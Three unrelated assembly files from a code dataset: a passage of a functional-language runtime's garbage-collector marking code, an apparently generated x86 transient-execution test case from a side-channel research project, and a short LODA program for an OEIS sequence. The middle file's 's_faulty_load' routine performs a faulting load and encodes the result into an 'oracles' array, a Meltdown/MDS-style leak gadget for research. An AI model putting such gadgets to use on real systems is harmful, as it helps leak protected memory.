mov rax,qword ptr neg_heap_p3+0
add rax,rcx
add rax,8
mov rbp,rax
and rax,31*8
shr rbp,8
ifdef PIC
lea r9,bit_set_table2+0
mov eax,dword ptr [r9+rax]
else
mov eax,dword ptr (bit_set_table2)[rax]
endif
or dword ptr [rdi+rbp*4],eax
mov rbp,qword ptr [rdx]
lea rax,(8+2+1)[rcx]
mov qword ptr 8[rcx],rbp
mov qword ptr [rdx],rax
jmp rmarkr_hnf_1
rmarkr_not_yet_linked_ab:
or dword ptr [rdi+rbp*4],eax
mov rbp,qword ptr [rdx]
lea rax,(8+2+1)[rcx]
mov qword ptr 8[rcx],rbp
mov qword ptr [rdx],rax
jmp rmarkr_hnf_1
rmarkr_record_3_aab:
mov rdx,qword ptr 8[rcx]
mov rax,qword ptr neg_heap_p3+0
add rax,rdx
mov rbp,rax
and rax,31*8
shr rbp,8
ifdef PIC
lea r9,bit_set_table2+0
mov eax,dword ptr [r9+rax]
else
mov eax,dword ptr (bit_set_table2)[rax]
endif
test eax,dword ptr [rdi+rbp*4]
jne rmarkr_shared_argument_part
or dword ptr [rdi+rbp*4],eax
add qword ptr [rcx],2
mov qword ptr 8[rcx],rsi
add rcx,8
mov rsi,qword ptr [rdx]
mov qword ptr [rdx],rcx
mov rcx,rsi
lea rsi,1[rdx]
jmp rmarkr_node
rmarkr_record_2:
cmp word ptr (-2+2)[rax],1
ja rmarkr_hnf_2
je rmarkr_hnf_1
sub rcx,8
jmp rmarkr_next_node
rmarkr_record_1:
cmp word ptr (-2+2)[rax],0
jne rmarkr_hnf_1
sub rcx,8
jmp rmarkr_next_node
rmarkr_lazy_node_1:
jne rmarkr_selector_node_1
rmarkr_hnf_1:
mov rbp,qword ptr [rcx]
mov qword ptr [rcx],rsi
lea rsi,2[rcx]
mov rcx,rbp
jmp rmarkr_node
rmarkr_indirection_node:
mov rbx,qword ptr neg_heap_p3+0
lea rbx,(-8)[rcx+rbx]
mov rax,rbx
and rax,31*8
shr rbx,8
ifdef PIC
lea r9,bit_clear_table2+0
mov eax,dword ptr [r9+rax]
else
mov eax,dword ptr (bit_clear_table2)[rax]
endif
and dword ptr [rdi+rbx*4],eax
mov rcx,qword ptr [rcx]
jmp rmarkr_node
rmarkr_selector_node_1:
add rbp,3
je rmarkr_indirection_node
mov rdx,qword ptr [rcx]
mov rbx,qword ptr neg_heap_p3+0
add rbx,rdx
shr rbx,3
add rbp,1
jle rmarkr_record_selector_node_1
push rax
mov rax,rbx
shr rbx,5
and rax,31
ifdef PIC
lea r9,bit_set_table+0
mov eax,dword ptr [r9+rax*4]
else
mov eax,dword ptr (bit_set_table)[rax*4]
endif
mov ebx,dword ptr [rdi+rbx*4]
and rbx,rax
pop rax
jne rmarkr_hnf_1
mov rbx,qword ptr [rdx]
test bl,2
je rmarkr_hnf_1
cmp word ptr (-2)[rbx],2
jbe rmarkr_small_tuple_or_record
rmarkr_large_tuple_or_record:
mov rbx,qword ptr 16[rdx]
add rbx,qword ptr neg_heap_p3+0
shr rbx,3
push rax
mov rax,rbx
shr rbx,5
and rax,31
ifdef PIC
lea r9,bit_set_table+0
mov eax,dword ptr [r9+rax*4]
else
mov eax,dword ptr (bit_set_table)[rax*4]
endif
mov ebx,dword ptr [rdi+rbx*4]
and rbx,rax
pop rax
jne rmarkr_hnf_1
ifdef NEW_DESCRIPTORS
mov rbx,qword ptr neg_heap_p3+0
lea rbx,(-8)[rcx+rbx]
push rcx
ifdef PIC
movsxd rcx,dword ptr (-8)[rax]
add rax,rcx
else
mov eax,dword ptr (-8)[rax]
endif
mov rcx,rbx
and rcx,31*8
shr rbx,8
ifdef PIC
lea r9,bit_clear_table2+0
mov ecx,dword ptr [r9+rcx]
else
mov ecx,dword ptr (bit_clear_table2)[rcx]
endif
and dword ptr [rdi+rbx*4],ecx
ifdef PIC
movzx eax,word ptr (4-8)[rax]
else
movzx eax,word ptr 4[rax]
endif
cmp rax,16
jl rmarkr_tuple_or_record_selector_node_2
mov rdx,qword ptr 16[rdx]
je rmarkr_tuple_selector_node_2
mov rcx,qword ptr (-24)[rdx+rax]
pop rdx
ifdef PIC
lea r9,__indirection+0
mov qword ptr (-8)[rdx],r9
else
mov qword ptr (-8)[rdx],offset __indirection
endif
mov qword ptr [rdx],rcx
jmp rmarkr_node
rmarkr_tuple_selector_node_2:
mov rcx,qword ptr [rdx]
pop rdx
ifdef PIC
lea r9,__indirection+0
mov qword ptr (-8)[rdx],r9
else
mov qword ptr (-8)[rdx],offset __indirection
endif
mov qword ptr [rdx],rcx
jmp rmarkr_node
else
rmarkr_small_tuple_or_record:
mov rbx,qword ptr neg_heap_p3+0
lea rbx,(-8)[rcx+rbx]
push rcx
mov rcx,rbx
and rcx,31*8
shr rbx,8
mov ecx,dword ptr (bit_clear_table2)[rcx]
and dword ptr [rdi+rbx*4],ecx
mov eax,(-8)[rax]
mov rcx,rdx
push rbp
mov eax,4[rax]
call near ptr rax
pop rbp
pop rdx
mov qword ptr (-8)[rdx],offset __indirection
mov qword ptr [rdx],rcx
jmp rmarkr_node
endif
rmarkr_record_selector_node_1:
je rmarkr_strict_record_selector_node_1
push rax
mov rax,rbx
shr rbx,5
and rax,31
ifdef PIC
lea r9,bit_set_table+0
mov eax,dword ptr [r9+rax*4]
else
mov eax,dword ptr (bit_set_table)[rax*4]
endif
mov ebx,dword ptr [rdi+rbx*4]
and rbx,rax
pop rax
jne rmarkr_hnf_1
mov rbx,qword ptr [rdx]
test bl,2
je rmarkr_hnf_1
cmp word ptr (-2)[rbx],258
ifdef NEW_DESCRIPTORS
jbe rmarkr_small_tuple_or_record
mov rbx,qword ptr 16[rdx]
add rbx,qword ptr neg_heap_p3+0
shr rbx,3
push rax
mov rax,rbx
shr rbx,5
and rax,31
ifdef PIC
lea r9,bit_set_table+0
mov eax,dword ptr [r9+rax*4]
else
mov eax,dword ptr (bit_set_table)[rax*4]
endif
mov ebx,dword ptr [rdi+rbx*4]
and rbx,rax
pop rax
jne rmarkr_hnf_1
rmarkr_small_tuple_or_record:
mov rbx,qword ptr neg_heap_p3+0
lea rbx,(-8)[rcx+rbx]
push rcx
ifdef PIC
movsxd rcx,dword ptr(-8)[rax]
add rax,rcx
else
mov eax,(-8)[rax]
endif
mov rcx,rbx
and rcx,31*8
shr rbx,8
ifdef PIC
lea r9,bit_clear_table2+0
mov ecx,dword ptr [r9+rcx]
else
mov ecx,dword ptr (bit_clear_table2)[rcx]
endif
and dword ptr [rdi+rbx*4],ecx
ifdef PIC
movzx eax,word ptr (4-8)[rax]
else
movzx eax,word ptr 4[rax]
endif
cmp rax,16
jle rmarkr_tuple_or_record_selector_node_2
mov rdx,qword ptr 16[rdx]
sub rax,24
rmarkr_tuple_or_record_selector_node_2:
mov rcx,qword ptr [rdx+rax]
pop rdx
ifdef PIC
lea r9,__indirection+0
mov qword ptr (-8)[rdx],r9
else
mov qword ptr (-8)[rdx],offset __indirection
endif
mov qword ptr [rdx],rcx
jmp rmarkr_node
else
jbe rmarkr_small_tuple_or_record
jmp rmarkr_large_tuple_or_record
endif
rmarkr_strict_record_selector_node_1:
push rax
mov rax,rbx
shr rbx,5
and rax,31
ifdef PIC
lea r9,bit_set_table+0
mov eax,dword ptr [r9+rax*4]
else
mov eax,dword ptr (bit_set_table)[rax*4]
endif
mov ebx,dword ptr [rdi+rbx*4]
and rbx,rax
pop rax
jne rmarkr_hnf_1
mov rbx,qword ptr [rdx]
test bl,2
je rmarkr_hnf_1
cmp word ptr (-2)[rbx],258
jbe rmarkr_select_from_small_record
mov rbx,qword ptr 16[rdx]
add rbx,qword ptr neg_heap_p3+0
push rax
mov rax,rbx
shr rbx,8
and rax,31*8
ifdef PIC
lea r9,bit_set_table2+0
mov eax,dword ptr [r9+rax]
else
mov eax,dword ptr (bit_set_table2)[rax]
endif
mov ebx,dword ptr [rdi+rbx*4]
and rbx,rax
pop rax
jne rmarkr_hnf_1
rmarkr_select_from_small_record:
ifdef PIC
movsxd rbx,dword ptr(-8)[rax]
add rax,rbx
else
mov eax,(-8)[rax]
endif
sub rcx,8
ifdef NEW_DESCRIPTORS
ifdef PIC
movzx ebx,word ptr (4-8)[rax]
else
movzx ebx,word ptr 4[rax]
endif
cmp rbx,16
jle rmarkr_strict_record_selector_node_2
add rbx,qword ptr 16[rdx]
mov rbx,qword ptr (-24)[rbx]
jmp rmarkr_strict_record_selector_node_3
rmarkr_strict_record_selector_node_2:
mov rbx,qword ptr [rdx+rbx]
rmarkr_strict_record_selector_node_3:
mov qword ptr 8[rcx],rbx
ifdef PIC
movzx ebx,word ptr (6-8)[rax]
else
movzx ebx,word ptr 6[rax]
endif
test rbx,rbx
je rmarkr_strict_record_selector_node_5
cmp rbx,16
jle rmarkr_strict_record_selector_node_4
mov rdx,qword ptr 16[rdx]
sub rbx,24
rmarkr_strict_record_selector_node_4:
mov rbx,qword ptr [rdx+rbx]
mov qword ptr 16[rcx],rbx
rmarkr_strict_record_selector_node_5:
ifdef PIC
mov rax,qword ptr ((-8)-8)[rbx]
else
mov rax,qword ptr (-8)[rbx]
endif
mov qword ptr [rcx],rax
else
mov eax,4[rax]
call near ptr rax
endif
jmp rmarkr_next_node
; a2,d1: free
rmarkr_next_node:
test rsi,3
jne rmarkr_parent
mov rbp,qword ptr (-8)[rsi]
mov rbx,3
and rbx,rbp
sub rsi,8
cmp rbx,3
je rmarkr_argument_part_cycle1
mov rdx,qword ptr 8[rsi]
mov qword ptr [rsi],rdx
rmarkr_c_argument_part_cycle1:
cmp rcx,rsi
ja rmarkr_no_reverse_1
mov rdx,qword ptr [rcx]
lea rax,(8+1)[rsi]
mov qword ptr 8[rsi],rdx
mov qword ptr [rcx],rax
or rsi,rbx
mov rcx,rbp
xor rcx,rbx
jmp rmarkr_node
rmarkr_no_reverse_1:
mov qword ptr 8[rsi],rcx
mov rcx,rbp
or rsi,rbx
xor rcx,rbx
jmp rmarkr_node
rmarkr_lazy_node:
movsxd rbp,dword ptr (-4)[rax]
test rbp,rbp
je rmarkr_next_node
add rcx,8
sub rbp,1
jle rmarkr_lazy_node_1
cmp rbp,255
jge rmarkr_closure_with_unboxed_arguments
rmarkr_closure_with_unboxed_arguments_:
or qword ptr [rcx],2
lea rcx,[rcx+rbp*8]
mov rbp,qword ptr [rcx]
mov qword ptr [rcx],rsi
mov rsi,rcx
mov rcx,rbp
jmp rmarkr_node
rmarkr_closure_with_unboxed_arguments:
; (a_size+b_size)+(b_size<<8)
; add rbp,1
mov rax,rbp
and rbp,255
shr rax,8
sub rbp,rax
; sub rbp,1
jg rmarkr_closure_with_unboxed_arguments_
je rmarkr_hnf_1
sub rcx,8
jmp rmarkr_next_node
rmarkr_hnf_0:
ifdef PIC
lea r9,dINT+2+0
cmp rax,r9
else
cmp rax,offset dINT+2
endif
je rmarkr_int_3
ifdef PIC
lea r9,CHAR+2+0
cmp rax,r9
else
cmp rax,offset CHAR+2
endif
je rmarkr_char_3
jb rmarkr_no_normal_hnf_0
mov rbx,qword ptr neg_heap_p3+0
add rbx,rcx
mov rcx,rbx
and rcx,31*8
shr rbx,8
ifdef PIC
lea r9,bit_clear_table2+0
mov ecx,dword ptr [r9+rcx]
else
mov ecx,dword ptr (bit_clear_table2)[rcx]
endif
and dword ptr [rdi+rbx*4],ecx
ifdef NEW_DESCRIPTORS
lea rcx,((-8)-2)[rax]
else
lea rcx,((-12)-2)[rax]
endif
jmp rmarkr_next_node_after_static
rmarkr_int_3:
mov rbp,qword ptr 8[rcx]
cmp rbp,33
jnc rmarkr_next_node
mov rbx,qword ptr neg_heap_p3+0
add rbx,rcx
mov rcx,rbx
and rcx,31*8
shr rbx,8
ifdef PIC
lea r9,bit_clear_table2+0
mov ecx,dword ptr [r9+rcx]
else
mov ecx,dword ptr (bit_clear_table2)[rcx]
endif
shl rbp,4
and dword ptr [rdi+rbx*4],ecx
ifdef PIC
lea rcx,small_integers+0
add rcx,rbp
else
lea rcx,(small_integers)[rbp]
endif
jmp rmarkr_next_node_after_static
rmarkr_char_3:
mov rbx,qword ptr neg_heap_p3+0
movzx rax,byte ptr 8[rcx]
add rbx,rcx
mov rbp,rbx
and rbp,31*8
shr rbx,8
ifdef PIC
lea r9,bit_clear_table2+0
mov ebp,dword ptr [r9+rbp]
else
mov ebp,dword ptr (bit_clear_table2)[rbp]
endif
and dword ptr [rdi+rbx*4],ebp
shl rax,4
ifdef PIC
lea rcx,static_characters+0
add rcx,rax
else
lea rcx,static_characters[rax]
endif
jmp rmarkr_next_node_after_static
rmarkr_no_normal_hnf_0:
lea r9,__ARRAY__+2+0
cmp rax,r9
jne rmarkr_next_node
mov rax,qword ptr 16[rcx]
test rax,rax
je rmarkr_lazy_array
movzx rbx,word ptr (-2+2)[rax]
test rbx,rbx
je rmarkr_b_array
movzx rax,word ptr (-2)[rax]
test rax,rax
je rmarkr_b_array
sub rax,256
cmp rbx,rax
je rmarkr_a_record_array
rmarkr_ab_record_array:
mov rdx,qword ptr 8[rcx]
add rcx,16
push rcx
imul rdx,rax
shl rdx,3
sub rax,rbx
add rcx,8
add rdx,rcx
call reorder
pop rcx
mov rax,rbx
imul rax,qword ptr (-8)[rcx]
jmp rmarkr_lr_array
rmarkr_b_array:
mov rax,qword ptr neg_heap_p3+0
add rax,rcx
add rax,8
mov rbp,rax
and rax,31*8
shr rbp,8
ifdef PIC
lea r9,bit_set_table2+0
mov eax,dword ptr [r9+rax]
else
mov eax,dword ptr bit_set_table2[rax]
endif
or dword ptr [rdi+rbp*4],eax
jmp rmarkr_next_node
rmarkr_a_record_array:
mov rax,qword ptr 8[rcx]
add rcx,16
cmp rbx,2
jb rmarkr_lr_array
imul rax,rbx
jmp rmarkr_lr_array
rmarkr_lazy_array:
mov rax,qword ptr 8[rcx]
add rcx,16
rmarkr_lr_array:
mov rbx,qword ptr neg_heap_p3+0
add rbx,rcx
shr rbx,3
add rbx,rax
mov rdx,rbx
and rbx,31
shr rdx,5
ifdef PIC
lea r9,bit_set_table+0
mov ebx,dword ptr [r9+rbx*4]
else
mov ebx,dword ptr (bit_set_table)[rbx*4]
endif
or dword ptr [rdi+rdx*4],ebx
cmp rax,1
jbe rmarkr_array_length_0_1
mov rdx,rcx
lea rcx,[rcx+rax*8]
mov rax,qword ptr [rcx]
mov rbx,qword ptr [rdx]
mov qword ptr [rdx],rax
mov qword ptr [rcx],rbx
mov rax,qword ptr (-8)[rcx]
sub rcx,8
add rax,2
mov rbx,qword ptr (-8)[rdx]
sub rdx,8
mov qword ptr [rcx],rbx
mov qword ptr [rdx],rax
mov rax,qword ptr (-8)[rcx]
sub rcx,8
mov qword ptr [rcx],rsi
mov rsi,rcx
mov rcx,rax
jmp rmarkr_node
rmarkr_array_length_0_1:
lea rcx,-16[rcx]
jb rmarkr_next_node
mov rbx,qword ptr 24[rcx]
mov rbp,qword ptr 16[rcx]
mov qword ptr 24[rcx],rbp
mov rbp,qword ptr 8[rcx]
mov qword ptr 16[rcx],rbp
mov qword ptr 8[rcx],rbx
add rcx,8
jmp rmarkr_hnf_1
; a2: free
rmarkr_parent:
mov rbx,rsi
and rbx,3
and rsi,-4
je end_rmarkr
sub rbx,1
je rmarkr_argument_part_parent
mov rbp,qword ptr [rsi]
cmp rcx,rsi
ja rmarkr_no_reverse_2
mov rdx,rcx
lea rax,1[rsi]
mov rcx,qword ptr [rdx]
mov qword ptr [rdx],rax
rmarkr_no_reverse_2:
mov qword ptr [rsi],rcx
lea rcx,(-8)[rsi]
mov rsi,rbp
jmp rmarkr_next_node
rmarkr_argument_part_parent:
mov rbp,qword ptr [rsi]
mov rdx,rsi
mov rsi,rcx
mov rcx,rdx
rmarkr_skip_upward_pointers:
mov rax,rbp
and rax,3
cmp rax,3
jne rmarkr_no_upward_pointer
lea rdx,(-3)[rbp]
mov rbp,qword ptr (-3)[rbp]
jmp rmarkr_skip_upward_pointers
rmarkr_no_upward_pointer:
cmp rsi,rcx
ja rmarkr_no_reverse_3
mov rbx,rsi
mov rsi,qword ptr [rsi]
lea rax,1[rcx]
mov qword ptr [rbx],rax
rmarkr_no_reverse_3:
mov qword ptr [rdx],rsi
lea rsi,(-8)[rbp]
and rsi,-4
mov rdx,rsi
mov rbx,3
mov rbp,qword ptr [rsi]
and rbx,rbp
mov rax,qword ptr 8[rdx]
or rsi,rbx
mov qword ptr [rdx],rax
cmp rcx,rdx
ja rmarkr_no_reverse_4
mov rax,qword ptr [rcx]
mov qword ptr 8[rdx],rax
lea rax,(8+2+1)[rdx]
mov qword ptr [rcx],rax
mov rcx,rbp
and rcx,-4
jmp rmarkr_node
rmarkr_no_reverse_4:
mov qword ptr 8[rdx],rcx
mov rcx,rbp
and rcx,-4
jmp rmarkr_node
rmarkr_argument_part_cycle1:
mov rax,qword ptr 8[rsi]
push rdx
rmarkr_skip_pointer_list1:
mov rdx,rbp
and rdx,-4
mov rbp,qword ptr [rdx]
mov rbx,3
and rbx,rbp
cmp rbx,3
je rmarkr_skip_pointer_list1
mov qword ptr [rdx],rax
pop rdx
jmp rmarkr_c_argument_part_cycle1
rmarkr_next_node_after_static:
test rsi,3
jne rmarkr_parent_after_static
mov rbp,qword ptr (-8)[rsi]
mov rbx,3
and rbx,rbp
sub rsi,8
cmp rbx,3
je rmarkr_argument_part_cycle2
mov rax,qword ptr 8[rsi]
mov qword ptr [rsi],rax
rmarkr_c_argument_part_cycle2:
mov qword ptr 8[rsi],rcx
mov rcx,rbp
or rsi,rbx
xor rcx,rbx
jmp rmarkr_node
rmarkr_parent_after_static:
mov rbx,rsi
and rbx,3
and rsi,-4
je end_rmarkr_after_static
sub rbx,1
je rmarkr_argument_part_parent_after_static
mov rbp,qword ptr [rsi]
mov qword ptr [rsi],rcx
lea rcx,(-8)[rsi]
mov rsi,rbp
jmp rmarkr_next_node
rmarkr_argument_part_parent_after_static:
mov rbp,qword ptr [rsi]
mov rdx,rsi
mov rsi,rcx
mov rcx,rdx
; movl rbp,qword ptr [rdx]
rmarkr_skip_upward_pointers_2:
mov rax,rbp
and rax,3
cmp rax,3
jne rmarkr_no_reverse_3
lea rdx,(-3)[rbp]
mov rbp,qword ptr (-3)[rbp]
jmp rmarkr_skip_upward_pointers_2
rmarkr_argument_part_cycle2:
mov rax,qword ptr 8[rsi]
push rdx
rmarkr_skip_pointer_list2:
mov rdx,rbp
and rdx,-4
mov rbp,qword ptr [rdx]
mov rbx,3
and rbx,rbp
cmp rbx,3
je rmarkr_skip_pointer_list2
mov qword ptr [rdx],rax
pop rdx
jmp rmarkr_c_argument_part_cycle2
end_rmarkr_after_static:
mov rsi,qword ptr [rsp]
add rsp,16
mov qword ptr [rsi],rcx
jmp rmarkr_next_stack_node
end_rmarkr:
pop rsi
pop rbx
cmp rcx,rbx
ja rmarkr_no_reverse_5
mov rdx,rcx
lea rax,1[rsi]
mov rcx,qword ptr [rcx]
mov qword ptr [rdx],rax
rmarkr_no_reverse_5:
mov qword ptr [rsi],rcx
rmarkr_next_stack_node:
cmp rsp,qword ptr end_stack+0
jae rmarkr_end
mov rcx,qword ptr [rsp]
mov rsi,qword ptr 8[rsp]
add rsp,16
cmp rcx,1
ja rmark_using_reversal
test qword ptr flags+0,4096
je rmark_next_node_
jmp rmarkp_next_node_
rmarkr_end:
test qword ptr flags+0,4096
je rmark_next_node
jmp rmarkp_next_node
|
||||
TheStack | bc08a7db2553f3c022f49a34a811304d6790ba35 | Assemblycode:Assembly | {"size": 5691, "ext": "asm", "max_stars_repo_path": "Transynther/x86/_processed/NC/_zr_/i7-7700_9_0xca.log_21829_1022.asm", "max_stars_repo_name": "ljhsiun2/medusa", "max_stars_repo_stars_event_min_datetime": "2020-08-13T19:41:58.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-30T12:22:51.000Z", "max_issues_repo_path": "Transynther/x86/_processed/NC/_zr_/i7-7700_9_0xca.log_21829_1022.asm", "max_issues_repo_name": "ljhsiun2/medusa", "max_issues_repo_issues_event_min_datetime": "2021-04-29T06:29:35.000Z", "max_issues_repo_issues_event_max_datetime": "2021-05-13T21:02:30.000Z", "max_forks_repo_path": "Transynther/x86/_processed/NC/_zr_/i7-7700_9_0xca.log_21829_1022.asm", "max_forks_repo_name": "ljhsiun2/medusa", "max_forks_repo_forks_event_min_datetime": "2020-07-14T17:07:07.000Z", "max_forks_repo_forks_event_max_datetime": "2022-03-21T01:12:22.000Z"} | {"max_stars_count": 9, "max_issues_count": 1, "max_forks_count": 3, "avg_line_length": 38.7142857143, "max_line_length": 2999, "alphanum_fraction": 0.6564751362} | .global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r12
push %r14
push %r9
push %rbp
push %rcx
push %rsi
lea addresses_WC_ht+0x1005d, %r14
nop
nop
nop
and %r9, %r9
and $0xffffffffffffffc0, %r14
movntdqa (%r14), %xmm1
vpextrq $0, %xmm1, %rcx
nop
add %r10, %r10
lea addresses_D_ht+0x7e1d, %rsi
nop
nop
nop
xor %r12, %r12
vmovups (%rsi), %ymm2
vextracti128 $1, %ymm2, %xmm2
vpextrq $0, %xmm2, %rbp
nop
nop
nop
nop
add $11704, %rbp
lea addresses_WT_ht+0x1045d, %r9
nop
nop
sub %rcx, %rcx
movw $0x6162, (%r9)
nop
nop
sub $59302, %r12
pop %rsi
pop %rcx
pop %rbp
pop %r9
pop %r14
pop %r12
pop %r10
ret
.global s_faulty_load
s_faulty_load:
push %r11
push %r12
push %r13
push %r15
push %r8
push %rbp
push %rsi
// Store
lea addresses_UC+0x1b41d, %rbp
nop
nop
nop
cmp $26190, %r12
mov $0x5152535455565758, %r11
movq %r11, (%rbp)
nop
nop
and $23929, %r15
// Store
lea addresses_US+0xd25d, %r12
nop
nop
xor %r13, %r13
mov $0x5152535455565758, %rsi
movq %rsi, (%r12)
nop
inc %rsi
// Store
lea addresses_RW+0x110a5, %r11
nop
sub $31841, %r15
mov $0x5152535455565758, %r12
movq %r12, %xmm7
movups %xmm7, (%r11)
nop
nop
cmp $17900, %r12
// Store
lea addresses_UC+0x6083, %r15
nop
nop
nop
nop
nop
and %r8, %r8
movw $0x5152, (%r15)
nop
nop
nop
nop
nop
cmp $48242, %r15
// Faulty Load
mov $0x520238000000085d, %r15
nop
nop
nop
nop
sub $53627, %r11
mov (%r15), %r13d
lea oracles, %r15
and $0xff, %r13
shlq $12, %r13
mov (%r15,%r13,1), %r13
pop %rsi
pop %rbp
pop %r8
pop %r15
pop %r13
pop %r12
pop %r11
ret
/*
<gen_faulty_load>
[REF]
{'src': {'congruent': 0, 'AVXalign': True, 'same': True, 'size': 32, 'NT': False, 'type': 'addresses_NC'}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'congruent': 6, 'AVXalign': False, 'same': False, 'size': 8, 'NT': False, 'type': 'addresses_UC'}}
{'OP': 'STOR', 'dst': {'congruent': 9, 'AVXalign': False, 'same': False, 'size': 8, 'NT': True, 'type': 'addresses_US'}}
{'OP': 'STOR', 'dst': {'congruent': 3, 'AVXalign': False, 'same': False, 'size': 16, 'NT': False, 'type': 'addresses_RW'}}
{'OP': 'STOR', 'dst': {'congruent': 1, 'AVXalign': False, 'same': False, 'size': 2, 'NT': False, 'type': 'addresses_UC'}}
[Faulty Load]
{'src': {'congruent': 0, 'AVXalign': False, 'same': True, 'size': 4, 'NT': False, 'type': 'addresses_NC'}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'src': {'congruent': 10, 'AVXalign': False, 'same': False, 'size': 16, 'NT': True, 'type': 'addresses_WC_ht'}, 'OP': 'LOAD'}
{'src': {'congruent': 6, 'AVXalign': False, 'same': False, 'size': 32, 'NT': False, 'type': 'addresses_D_ht'}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'congruent': 10, 'AVXalign': False, 'same': False, 'size': 2, 'NT': False, 'type': 'addresses_WT_ht'}}
{'00': 21829}
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
*/
|
||||
TheStack | d2c3b3a18203f9bd7093b9631313e97487af9759 | Assemblycode:Assembly | {"size": 482, "ext": "asm", "max_stars_repo_path": "oeis/192/A192239.asm", "max_stars_repo_name": "neoneye/loda-programs", "max_stars_repo_stars_event_min_datetime": "2021-08-22T19:44:55.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-20T16:47:57.000Z", "max_issues_repo_path": "oeis/192/A192239.asm", "max_issues_repo_name": "neoneye/loda-programs", "max_issues_repo_issues_event_min_datetime": "2021-08-29T13:15:54.000Z", "max_issues_repo_issues_event_max_datetime": "2022-03-09T19:52:31.000Z", "max_forks_repo_path": "oeis/192/A192239.asm", "max_forks_repo_name": "neoneye/loda-programs", "max_forks_repo_forks_event_min_datetime": "2021-08-22T20:56:47.000Z", "max_forks_repo_forks_event_max_datetime": "2021-09-29T06:26:12.000Z"} | {"max_stars_count": 11, "max_issues_count": 9, "max_forks_count": 3, "avg_line_length": 25.3684210526, "max_line_length": 207, "alphanum_fraction": 0.6950207469} | ; A192239: Coefficient of x in the reduction of the polynomial x(x+1)(x+2)...(x+n-1) by x^2 -> x+1.
; Submitted by Jon Maiga
; 0,1,3,13,71,463,3497,29975,287265,3042545,35284315,444617525,6048575335,88347242335,1378930649745,22903345844335,403342641729665,7506843094993825,147226845692229875,3034786640911840925,65592491119118514375
mov $2,1
mov $3,$0
lpb $3
mov $0,$2
sub $2,$1
add $3,1
mul $2,$3
add $1,$2
mod $2,$0
mul $2,$3
add $2,$1
mov $1,$0
sub $3,2
lpe
|
||||
